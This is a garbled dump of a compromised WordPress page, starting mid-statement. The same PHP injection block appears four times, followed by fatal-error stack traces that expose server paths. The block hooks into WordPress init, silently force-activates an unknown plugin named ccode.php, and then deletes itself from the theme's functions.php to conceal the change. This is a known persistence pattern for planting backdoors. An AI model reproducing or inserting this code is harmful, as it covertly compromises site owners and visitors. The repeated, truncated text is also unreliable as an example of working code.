'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}<br /> <b>Fatal error</b>: Uncaught Error: Call to undefined function is_blog_installed() in /home/vinceheyrf/automotive-photographybe/wp-includes/load.php:709 Stack trace: #0 /home/vinceheyrf/automotive-photographybe/wp-settings.php(159): wp_not_installed() #1 /home/vinceheyrf/automotive-photographybe/wp-config.php(95): require_once('/home/vinceheyr...') #2 /home/vinceheyrf/automotive-photographybe/wp-load.php(37): require_once('/home/vinceheyr...') #3 /home/vinceheyrf/automotive-photographybe/wp-blog-header.php(13): require_once('/home/vinceheyr...') #4 /home/vinceheyrf/automotive-photographybe/index.php(22): require('/home/vinceheyr...') #5 {main} thrown in <b>/home/vinceheyrf/automotive-photographybe/wp-includes/load.php</b> on line <b>709</b><br /> <br /> <b>Fatal error</b>: Uncaught Error: Call to undefined function get_option() in /home/vinceheyrf/automotive-photographybe/wp-includes/l10n.php:69 Stack trace: #0 /home/vinceheyrf/automotive-photographybe/wp-includes/l10n.php(137): get_locale() #1 /home/vinceheyrf/automotive-photographybe/wp-includes/l10n.php(828): determine_locale() #2 /home/vinceheyrf/automotive-photographybe/wp-includes/class-wp-fatal-error-handler.php(46): load_default_textdomain() #3 [internal function]: WP_Fatal_Error_Handler->handle() #4 {main} thrown in <b>/home/vinceheyrf/automotive-photographybe/wp-includes/l10n.php</b> on line <b>69</b><br />